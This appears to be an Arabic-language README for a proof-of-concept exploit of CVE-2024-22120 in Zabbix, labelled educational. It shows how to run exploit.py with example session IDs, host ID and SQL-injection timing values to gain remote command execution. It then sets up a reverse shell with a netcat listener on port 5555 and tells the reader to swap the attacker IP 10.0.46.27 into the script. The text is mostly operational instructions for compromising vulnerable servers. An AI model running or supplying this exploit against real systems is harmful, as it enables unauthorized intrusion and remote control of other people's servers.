
استغلال إثبات المفهوم لـ CVE-2024-22120 الذي يستخدم حقن SQL زمني و SSRF قائم على gopher لتحقيق تنفيذ الأوامر عن بُعد على خوادم Zabbix الضعيفة للبحث الأمني التعليمي.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
لقد حددت خادم Zabbix يعمل على IP 192.168.1.100، ولديك وصول إلى مستخدم بصلاحيات محدودة بالتفاصيل التالية:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gتريد استغلال ثغرة RCE باستخدام هذا السكريبت.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: عنوان IP لخادم Zabbix.--sid d82bf6715e1d3c1f25: معرف الجلسة لمستخدم بصلاحيات محدودة.--hostid 10107: معرف المضيف الذي يمكن للمستخدم ذو الصلاحيات المحدودة الوصول إليه.--phpsessid a4g7f48d9j3r7h8s9g: معرف جلسة PHP المستخدم لمصادقة الطلبات.--false_time 1: الوقت بالثواني للتوقف في حالة تخمين خاطئ أثناء حقن SQL (الافتراضي هو 1 ثانية).--true_time 3: الوقت بالثواني للتوقف في حالة تخمين صحيح أثناء حقن SQL (الافتراضي هو 3 ثوانٍ).10.0.46.27:5555 في السكريبت).تأكد من أن جهازك يستمع على المنفذ المحدد (5555 في السكريبت) لاستقبال الشيل العكسي. يمكنك استخدام netcat لذلك:
nc -lvnp 5555
استبدل IP 10.0.46.27 والمنفذ 5555 في دالة CreateScript بعنوان IP الخاص بك والمنفذ المطلوب لاستقبال الشيل العكسي.